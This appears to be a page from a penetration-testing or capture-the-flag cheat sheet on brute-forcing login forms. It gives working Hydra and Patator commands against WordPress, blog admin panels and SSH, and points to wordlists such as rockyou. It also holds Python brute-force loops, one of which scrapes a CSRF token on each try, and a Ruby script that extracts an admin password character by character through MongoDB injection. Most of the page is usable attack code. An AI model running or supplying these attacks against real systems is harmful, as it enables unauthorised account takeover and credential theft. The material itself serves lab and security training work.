Hydra Brutes

Hydra Brute Force

  • If login attempts give an "Invalid Username"

  • We can Brute-Force based on this error

  • You could use Burp for the keywords first (if you need it)

  • Wordlist (common passwords)

    • /usr/share/dirb/wordlists/common.txt

    • 10k_most_common.txt ..faster than rockyou, but decent!

    • .. SecLists/Passwords/Leaked-Databases/rockyou.txt

    • .. SecLists/Passwords/twitter-banned.txt ..small list of good pws

---------------------------
wordpress/blog
> hydra -vV -L users.dic -p wedontcare 192.x.x.x http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:=Invalid username"
> hydra -vV -l admin -P dict.txt -f -t 2 10.x.x.x http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect username"
> hydra -vV -l admin -P rockyou.txt -f -t 2 10.x.x.x http-post-form "/department/login.php:username=^USER^&password=^PASS^&Login=Login:Invalid Password!"
> hydra -vV -l admin -P rockyou.txt -f -t 2 10.x.x.x https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true&Login=Login:Incorrect"
> hydra -vV -l admin -P /usr/share/wordlists/rockyou.txt -f -t 64 10.x.x.x http-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect"
---------------------------

web-form-login
> hydra -t 1 -l admin -P common.txt -vV http-get://192.x.x.x/admin
> hydra -t 1 -l admin -P rockyou.txt -vV http-get://192.x.x.x/nibbleblog/admin.php

---------------------------
ssh
hydra -L users.txt -P pass.txt ssh://10.x.x.x

-t 64  ..if you want to speed up threads  !!!!

Trim your wordlist

  • REF: DictsListsMangling

  • Example: Pull everything with 'nibble' in the word and.. try ONLY these

grep -i nibble /opt/.../rockyou.txt > mydict.txt

REF: Fuzzing, Wordpress

Patator

patator http_fuzz url="http://10.10.10.43/department/login.php"
method=POST body='username=admin&password=FILE0' 0=rockyou.txt 
follow=1 accept_cookie=1 
-x ignore:fgrep='Invalid Password!'
-x quit:fgrep='Hi admin'

patator http_fuzz url="https://10.10.10.43/db/index.php"
method=POST body='password=FILE0&login=Log+In&proc_login=true' 0=rockyou.txt 
follow=1 accept_cookie=1 
-x ignore:fgrep='Incorrect password.' 
-x quit:fgrep='test'

Python Brute Force Starter Script:

sudo apt-get install python
sudo apt-get install python-pip
pip install requests

import requests as rq
req = rq.get("http://xyz.com/login.php?pass=1234")
print(req.text)

Python Brute Loop:

import requests as rq
for i in range(1300,99999):
    req = rq.get("http://xyz.com/login.php?pass="+str(i))
    if "Wrong pass" in req.text:
        print("Attempt #%d" % i)
    else:
        print("\n\nSuccess!\nPassword: %d" % i)
        break

Ruby Brute Loop

  • Ruby Script for passwords on MongoDBInjection

  • Test every letter to see if it matches the 'first' letter/set

--------------------
Goal:
5b317d17-3ee3-4865-8605-bb579f58c10a

--------------------
Loop every digit:
a
b
c
ca
cb
cc

--------------------
Need 'httparty' module
>> sudu gem install httparty
>> vi expl.rb

--------------------
require 'httparty'
URL="mymongo.com"
def check?(str)
  resp = HTTParty.get("http://#{URL}/?search=admin' %26%26 this.password.match(/^#{str}/)%00")
  return resp.body=~ />admin</
end
#puts check?("5").inspect
#puts check?("a").inspect
CHARSET = ('a'..'z').to_a+('0'..'9').to_a+['-']
password = ""

while true
  CHARSET.each do |c|
	puts "Trying: #{c} for #{password}"
	test = password+c
	if check?("^#{test}.*$")
	  password+=c
	  puts password
	  break
	  end
  end
end

--------------------
Note:
^5       ..starts with 5
>admin<  ..used this b/c success page had this tag with >< marks
"5" and "aaa" as yes/no examples

Brute CSRF Python

  • Scrape the page and get the csrf token

  • REF: SenseHTB ippsec, pfsense

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import re
re_csrf = 'csrfMagicToken = *(.*?)*'
s = requests.session()
lines = open('passwords.txt')
for password in lines:
    r = s.post('http://127.0.0.1/index.php')
    csrf = re.findall(re_csrf, r.text)[0]
    login = {'__csrf_magic': csrf, 'usernamefld': 'rohit', 'passwordfld': password[:-1], 'login': 'login'}
    r = s.post('http://127.0.0.1/index.php', data=login)
    if 'Dashboard' in r.text:
        print("Valid Login %s:%s" % ("rohit", password[:-1]))
    else:
        print("Failed")
        s.cookies.clear()
#print(r.text)
#print(csrf)

execute:
python3 bf-pf.py
PreviousGet HashesNextImages Exif Steg

Last updated